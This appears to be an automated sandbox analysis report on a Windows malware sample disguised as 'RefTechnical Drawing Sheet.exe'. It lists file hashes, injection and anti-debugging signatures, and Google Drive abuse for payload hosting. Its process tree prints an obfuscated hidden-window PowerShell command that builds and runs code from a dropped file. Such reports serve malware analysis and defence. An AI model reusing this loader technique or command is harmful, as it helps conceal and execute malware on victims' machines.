Analysis
-
max time kernel
53s -
max time network
60s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
21/03/2024, 03:56
Static task
static1
Behavioral task
behavioral1
Sample
RefTechnical Drawing Sheet.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
RefTechnical Drawing Sheet.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
Bedwarmer.ps1
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
Bedwarmer.ps1
Resource
win10v2004-20240226-en
General
-
Target
RefTechnical Drawing Sheet.exe
-
Size
963KB
-
MD5
2f96e6fd36ceec8c32dcc6c7607a87bd
-
SHA1
89b9bd60c39a582da440112f12f939c90102d567
-
SHA256
11bfafb62ab5e5c115862409c849f069dc0903abf0f864783bea73472db19932
-
SHA512
755e29062263821fac7c37be3dd7e0b980804adbe301d1945c9098ca1cb8ae57f293a022a2e11677e404bac323b4e5995d4c57d45c2edb13595ff151547993b9
-
SSDEEP
12288:wbZfqmfr+7Iz6tuhHr2WX3rLKJQEKKHP9SxG4A1wF7dieRJ14BEtIX2UgGj+Xtah:wbZCmf67FtuZFX3KJQgl4KEoEoePUF3Z
Malware Config
Signatures
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 67 drive.google.com 68 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 2952 wab.exe 2952 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4984 powershell.exe 2952 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4984 set thread context of 2952 4984 powershell.exe 104 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4984 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4984 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 3036 wrote to memory of 4984 3036 RefTechnical Drawing Sheet.exe 89 PID 3036 wrote to memory of 4984 3036 RefTechnical Drawing Sheet.exe 89 PID 3036 wrote to memory of 4984 3036 RefTechnical Drawing Sheet.exe 89 PID 4984 wrote to memory of 2496 4984 powershell.exe 99 PID 4984 wrote to memory of 2496 4984 powershell.exe 99 PID 4984 wrote to memory of 2496 4984 powershell.exe 99 PID 4984 wrote to memory of 2952 4984 powershell.exe 104 PID 4984 wrote to memory of 2952 4984 powershell.exe 104 PID 4984 wrote to memory of 2952 4984 powershell.exe 104 PID 4984 wrote to memory of 2952 4984 powershell.exe 104 PID 4984 wrote to memory of 2952 4984 powershell.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\RefTechnical Drawing Sheet.exe"C:\Users\Admin\AppData\Local\Temp\RefTechnical Drawing Sheet.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Trykimprgnerede=Get-Content 'C:\Users\Admin\AppData\Local\butikstiders\Sjunger\Bedwarmer.Hom';$Ekstraparlementarisk=$Trykimprgnerede.SubString(59534,3);.$Ekstraparlementarisk($Trykimprgnerede)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"3⤵PID:2496
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2952
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
58KB
MD5aae5fcb1e66470ef7a08ea335b80ac05
SHA19422c0898c87a134c72c6ffa35c594d93dba9dc9
SHA2568bd9205c7c8f112ff5cba1307842eddccc18e20e227cccb7b74e6a24e686b8b0
SHA512031d187a47a9b687d6822f34e74029f2f1cf4eb8687dc2846a3d84efbf9d30d5459870842a22cdab89130915501e2593f79b2a32da5c266d382120e0a042b072
-
Filesize
347KB
MD51178f466a9ac164a3ca05ffd715235dc
SHA1e593a180adbbb864047e9dbc5e07a6d27a252139
SHA25638bea98d1ec5467345cf29e1a7f1ec9a25fbe7801c8a498ec05e97b6dbf9545b
SHA51261269e7303efba0f6d2790b780b9f4348567c6ad48481822201b37e13c17f255d35b368d109ba6c9d9a66d9af1adb7f2db9e3ec6ab1b351f80fce368f23a3650